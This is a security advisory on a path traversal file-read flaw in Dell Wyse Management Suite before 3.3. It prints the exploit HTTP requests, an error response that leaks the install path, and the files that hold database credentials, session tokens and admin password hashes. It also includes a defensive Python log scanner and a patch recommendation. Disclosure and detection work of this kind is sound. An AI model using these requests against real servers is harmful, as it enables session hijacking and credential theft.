Vendor: Dell
Vendor URL: https://www.dell.com/support/home/en-us/product-support/product/wyse-wms/drivers 
Versions affected: Prior to version 3.3
Systems Affected: Any
Author: Stephen Tomkinson [email protected]
Advisory URL / CVE Identifier: CVE-2021-21586, CVE-2021-21587
Risk: High – can lead to compromise of administrative sessions

Summary

Thin clients are often found in secure environments as their diskless operation reduces physical security risks. Wyse Management Suite (WMS) acts as a central hub for Dell's thin client hardware, providing centralised provisioning and configuration. The Wyse Management Suite web interface and the configuration services used by the thin clients on boot are part of the same web application; it is therefore one of the few services which must be exposed to edge network connections even in secure environments.

On affected versions of WMS, it is possible to retrieve arbitrary files from the server, including database credentials and database files containing the session data of administrative users.

Location

The /ccm-web/image/os endpoint accepted filePath and fileName parameters which would retrieve files from anywhere on the operating system, e.g. GET /ccm-web/image/os?filePath=c:\windows\&fileName=win.ini

Exploitation was aided by a second endpoint which revealed the path the product was installed to via a verbose error message. This could be triggered with PUT /ccm-web/image/pull/a/b

Impact

An attacker with physical access to a thin client and its network connection can exploit this vulnerability to gain access to the management interface of the whole thin client estate. The management interface includes features such as resetting BIOS passwords and remotely shadowing terminal screens via VNC.

Details

Access to the vulnerable endpoint was authenticated with a Wyse device ID. This ID can be retrieved from a configured Wyse thin client using a man-in-the-middle attack. As the WMS is used to provision TLS certificates, communication between a thin client and the WMS is often performed over TLS but without verification of the server certificate. This can be forced by a DNS or DHCP setting retrieved by the thin client early in the boot process.

With a valid device ID, requests to the vulnerable endpoints can be made, first to obtain the installation path of the software:

PUT /ccm-web/image/pull/a/b HTTP/1.1
Host: [redacted]
X-Stratus-device-id:wyse106[redacted]3149

Which resulted in the following error, revealing the internal path:

HTTP/1.1 500 
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=4443165646FDA1BA417D08917BFD17C7; Path=/ccm-web; Secure; HttpOnly
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 107
Date: Fri, 16 Apr 2021 10:51:51 GMT
Connection: close

E:\Program Files\DELL\Software\repository\imagePull\staging\a\b (The system cannot find the path specified)

Then to the vulnerable endpoint to retrieve files:

GET /ccm-web/image/os?filePath=E:\Program Files\DELL\WMS\Database\SQL\stratus&fileName=persistentlogin.ibd HTTP/1.1
Host: [redacted]
X-Stratus-device-id:wyse106[redacted]3149

Resulting in retrieval of the embedded MySQL database table that held the session tokens for authenticated users of the WMS. Extracting the JSESSIONID cookie value from this table permitted session hijacking.
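The two requests above leave a distinctive trace in the Tomcat access log. The following is an added example (not part of the advisory or of Dell's product) showing how a defender can flag them: it parses common-format access log lines, raises a finding for a PUT to /ccm-web/image/pull/ that returns 500, and checks each /ccm-web/image/os request's filePath and fileName against an allowed repository root in the same way a fixed endpoint should before opening the file. The repository root, the client addresses and the osImages/wes10.rsp entry are assumptions, not values from the advisory.

```python
import re
import ntpath
from urllib.parse import urlsplit, parse_qs

# Assumed repository root (not stated in the advisory): the only tree the
# /ccm-web/image/os endpoint should ever serve files from.
REPOSITORY_ROOT = r"E:\Program Files\DELL\Software\repository"

# Tomcat access log in common format: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$')


def inside_root(file_path, file_name, root=REPOSITORY_ROOT):
    """True only if root, filePath and fileName combine to a file strictly under root."""
    # ntpath normalises Windows paths on any host. An absolute filePath replaces
    # root in the join, so it passes only if it already lies inside the repository;
    # '..' segments are collapsed before the prefix check.
    if file_name in ("", ".", "..") or file_name != ntpath.basename(file_name):
        return False  # fileName must be a bare name: no separators, no drive letter
    root_n = ntpath.normcase(ntpath.normpath(root))
    candidate = ntpath.normcase(ntpath.normpath(ntpath.join(root, file_path, file_name)))
    return candidate.startswith(root_n + "\\")


def scan_access_log(lines):
    """Return (line_no, client, reason) for requests matching the two advisory patterns."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        method, status, url = m["method"], int(m["status"]), urlsplit(m["target"])
        if method == "PUT" and url.path.startswith("/ccm-web/image/pull/") and status == 500:
            findings.append((n, m["src"], "install path disclosure probe (PUT image/pull -> 500)"))
        elif url.path == "/ccm-web/image/os":
            q = parse_qs(url.query)  # percent-decodes the parameter values
            file_path, file_name = q.get("filePath", [""])[0], q.get("fileName", [""])[0]
            if not inside_root(file_path, file_name):
                findings.append((n, m["src"], f"file read outside repository: {file_path!r} / {file_name!r}"))
    return findings


# Constructed sample log lines: client addresses and the osImages/wes10.rsp entry are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Apr/2021:10:51:51 +0000] "PUT /ccm-web/image/pull/a/b HTTP/1.1" 500 107
10.0.0.5 - - [16/Apr/2021:10:52:03 +0000] "GET /ccm-web/image/os?filePath=E:%5CProgram%20Files%5CDELL%5CWMS%5CDatabase%5CSQL%5Cstratus&fileName=persistentlogin.ibd HTTP/1.1" 200 98304
10.0.0.9 - - [16/Apr/2021:10:55:12 +0000] "GET /ccm-web/image/os?filePath=E:%5CProgram%20Files%5CDELL%5CSoftware%5Crepository%5CosImages&fileName=wes10.rsp HTTP/1.1" 200 4096
10.0.0.5 - - [16/Apr/2021:10:56:30 +0000] "GET /ccm-web/image/os?filePath=c:%5Cwindows%5C&fileName=win.ini HTTP/1.1" 200 403
""".splitlines()
```

Running scan_access_log(SAMPLE_LOG) flags lines 1, 2 and 4 and leaves the in-repository request on line 3 alone.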

Additional files of interest to an attacker include:

Path: {install_path}\Tomcat-9\webapps\ccm-web\WEB-INF\classes\bootstrap.properties
Contains: Database credentials encrypted with a fixed key

Path: {install_path}\Database\SQL\stratus\person.ibd
Contains: Passwords for WMS administrative users, hashed as SHA256(MD5(pass),salt)

Recommendation

Update to version 3.3 of Wyse Management Suite.

Vendor Communication

NCC Group Notifies Vendor: 7th May 2021
Vendor Replies Requesting More Details: 11th May 2021
NCC Group Sends Requested information: 11th May 2021
Vendor Confirms The Vulnerability: 20th May 2021
NCC Group Requests a Patch Date: 18th June 2021
Vendor Response With Date: 18th June 2021
Patch & Advisory Published: 6th July 2021

Thanks to

Dave Cash at NCC Group

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  6th July 2021

Written by:  Stephen Tomkinson